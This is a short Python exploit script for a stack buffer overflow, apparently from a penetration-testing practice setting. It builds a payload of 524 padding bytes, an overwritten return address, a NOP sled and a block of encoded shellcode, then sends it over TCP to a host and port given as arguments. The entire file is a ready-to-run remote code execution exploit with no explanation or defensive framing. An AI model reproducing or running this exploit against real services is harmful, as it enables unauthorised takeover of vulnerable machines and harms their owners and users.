import sys, socket, time
host = sys.argv[1]
port = int(sys.argv[2])

buf =  b""
buf += b"\xd9\xc0\xba\x23\xa0\xd9\xa3\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x52\x31\x57\x17\x83\xef\xfc\x03\x74\xb3\x3b"
buf += b"\x56\x86\x5b\x39\x99\x76\x9c\x5e\x13\x93\xad\x5e\x47"
buf += b"\xd0\x9e\x6e\x03\xb4\x12\x04\x41\x2c\xa0\x68\x4e\x43"
buf += b"\x01\xc6\xa8\x6a\x92\x7b\x88\xed\x10\x86\xdd\xcd\x29"
buf += b"\x49\x10\x0c\x6d\xb4\xd9\x5c\x26\xb2\x4c\x70\x43\x8e"
buf += b"\x4c\xfb\x1f\x1e\xd5\x18\xd7\x21\xf4\x8f\x63\x78\xd6"
buf += b"\x2e\xa7\xf0\x5f\x28\xa4\x3d\x29\xc3\x1e\xc9\xa8\x05"
buf += b"\x6f\x32\x06\x68\x5f\xc1\x56\xad\x58\x3a\x2d\xc7\x9a"
buf += b"\xc7\x36\x1c\xe0\x13\xb2\x86\x42\xd7\x64\x62\x72\x34"
buf += b"\xf2\xe1\x78\xf1\x70\xad\x9c\x04\x54\xc6\x99\x8d\x5b"
buf += b"\x08\x28\xd5\x7f\x8c\x70\x8d\x1e\x95\xdc\x60\x1e\xc5"
buf += b"\xbe\xdd\xba\x8e\x53\x09\xb7\xcd\x3b\xfe\xfa\xed\xbb"
buf += b"\x68\x8c\x9e\x89\x37\x26\x08\xa2\xb0\xe0\xcf\xc5\xea"
buf += b"\x55\x5f\x38\x15\xa6\x76\xff\x41\xf6\xe0\xd6\xe9\x9d"
buf += b"\xf0\xd7\x3f\x31\xa0\x77\x90\xf2\x10\x38\x40\x9b\x7a"
buf += b"\xb7\xbf\xbb\x85\x1d\xa8\x56\x7c\xf6\x17\x0e\x7f\x0b"
buf += b"\xf0\x4d\x7f\x17\xd2\xdb\x99\x7d\xc2\x8d\x32\xea\x7b"
buf += b"\x94\xc8\x8b\x84\x02\xb5\x8c\x0f\xa1\x4a\x42\xf8\xcc"
buf += b"\x58\x33\x08\x9b\x02\x92\x17\x31\x2a\x78\x85\xde\xaa"
buf += b"\xf7\xb6\x48\xfd\x50\x08\x81\x6b\x4d\x33\x3b\x89\x8c"
buf += b"\xa5\x04\x09\x4b\x16\x8a\x90\x1e\x22\xa8\x82\xe6\xab"
buf += b"\xf4\xf6\xb6\xfd\xa2\xa0\x70\x54\x05\x1a\x2b\x0b\xcf"
buf += b"\xca\xaa\x67\xd0\x8c\xb2\xad\xa6\x70\x02\x18\xff\x8f"
buf += b"\xab\xcc\xf7\xe8\xd1\x6c\xf7\x23\x52\x8c\x1a\xe1\xaf"
buf += b"\x25\x83\x60\x12\x28\x34\x5f\x51\x55\xb7\x55\x2a\xa2"
buf += b"\xa7\x1c\x2f\xee\x6f\xcd\x5d\x7f\x1a\xf1\xf2\x80\x0f"



offset= b"\x41" * 524 
eip = b"\xF3\x12\x17\x31"
nops = b"\x90" * 16

buffer = offset + eip  + nops + buf
print (buffer)

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(buffer)

client.close()
